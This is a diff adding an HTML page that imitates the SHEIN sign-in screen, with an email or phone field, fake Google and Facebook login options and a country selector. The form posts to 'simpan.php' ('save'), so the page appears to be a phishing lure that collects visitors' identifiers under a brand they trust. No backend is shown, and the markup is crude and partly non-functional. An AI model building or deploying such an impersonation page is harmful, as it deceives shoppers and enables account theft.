--- a/index.html
+++ b/index.html
@@ -1,1 +1,54 @@
 
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>SHEIN</title>
+</head>
+<body>
+    <header>
+        <h1 align="center">SHEIN my</h1>
+    </header>
+    <br>
+    <form align="center" action="simpan.php" method="post">
+    <label for="email">Mobile number or email address</label>
+    <br>
+    <input type="email" id="email" name="email" required>
+    </form>
+    <br>
+    <table align="center" class="style">
+        <tr>
+            <td class="td teks-putih latar-hitam">CONTINUE</td>
+        </tr>
+    </table>
+    <br>
+    <p align="center">--------- Or Join With -----------</p>
+    <br>
+    <table align="center" class="style">
+        <tr>
+            <td class="td teks-hitam latar-putih">Continue with Google</td>
+        </tr>
+        <tr>
+            <td class="td teks-hitam latar-putih">Continue with Facebook</td>
+        </tr>
+    </table>
+    <br>
+    <table>
+    <br>
+    <select name="contry" id="contry" required>
+        <option value=""></option>
+        <optgroup label="">
+            <option>Malaysia</option>
+            <option>Maldives</option>
+            <option>France</option>
+            <option>Italy</option>
+            <option>South Korea</option>
+        </optgroup>
+    </select>
+    </table>
+    <br>
+    <p align="center">By continuing, you agree to our Privacy & Cookie Policy</p>
+    <p align="center">and Terms & Conditions</p>
+</body>
+</html>
